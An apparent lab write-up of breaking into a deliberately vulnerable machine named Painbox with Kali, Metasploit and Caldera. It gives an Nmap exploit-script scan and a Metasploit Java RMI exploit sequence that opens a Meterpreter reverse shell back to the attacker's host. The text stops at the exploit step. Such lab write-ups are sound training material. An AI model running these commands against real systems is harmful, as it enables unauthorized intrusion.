June 28, 2024

The objective of this project was to break into a vulnerable system, cleverly named Painbox, and deploy a payload using the Caldera framework. The goal was to gain unauthorized access and create a file on the target system. Here's a detailed account of the journey, the challenges faced, and the lessons learned.

Setting the Stage

Target System Overview

• Target IP: Confidential
• System Name: Painbox
• Vulnerabilities Exploited: Java RMI Server and vsFTPd

Preparation

To kick things off, I set up a Kali Linux virtual machine and installed Caldera, following the documentation to the letter. With everything in place, it was time to dive into the action.

• Operating System: Kali Linux VM

  

• Tools and Software:

  • Metasploit for exploitation
  • SSH for remote access
  • Caldera for agent deployment
  • Go for compiling the agent

Exploitation Attempts

Initial Reconnaissance: Nmap Scan

Before attempting any exploits, I conducted an Nmap scan to identify exploitable ports and services on Painbox:

nmap -Pn --script exploit [target_ip]

This scan provided a detailed overview of the system’s open ports and services, helping to identify which Metasploit modules could be used for exploitation.

First Try: Java RMI Server

The initial exploit targeted the Java RMI Server. Here’s the command sequence:

msfconsole
use exploit/multi/misc/java_rmi_server
set RHOSTS [target_ip_address]
set LHOST [your_local_ip_address]
set PAYLOAD java/meterpreter/reverse_tcp
set LPORT 4444
exploit